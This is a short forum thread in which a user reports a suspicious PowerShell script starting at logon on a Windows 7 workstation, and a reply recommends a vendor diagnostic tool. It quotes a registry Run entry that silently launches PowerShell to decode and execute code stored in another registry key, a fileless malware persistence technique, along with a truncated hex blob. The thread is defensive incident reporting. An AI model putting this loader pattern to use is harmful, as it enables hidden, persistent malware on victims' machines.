strange power shell script

tecnicogsn

Dear Support,

today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.

Looking in Run key of the registry i seen this string: 

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

 

Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.

(The byte data is mutch longher)

 

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

 

Could be some king of malware?

etomcat

Hello,

 

I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.

 

Best Regards: Tamas Feher, Hungary.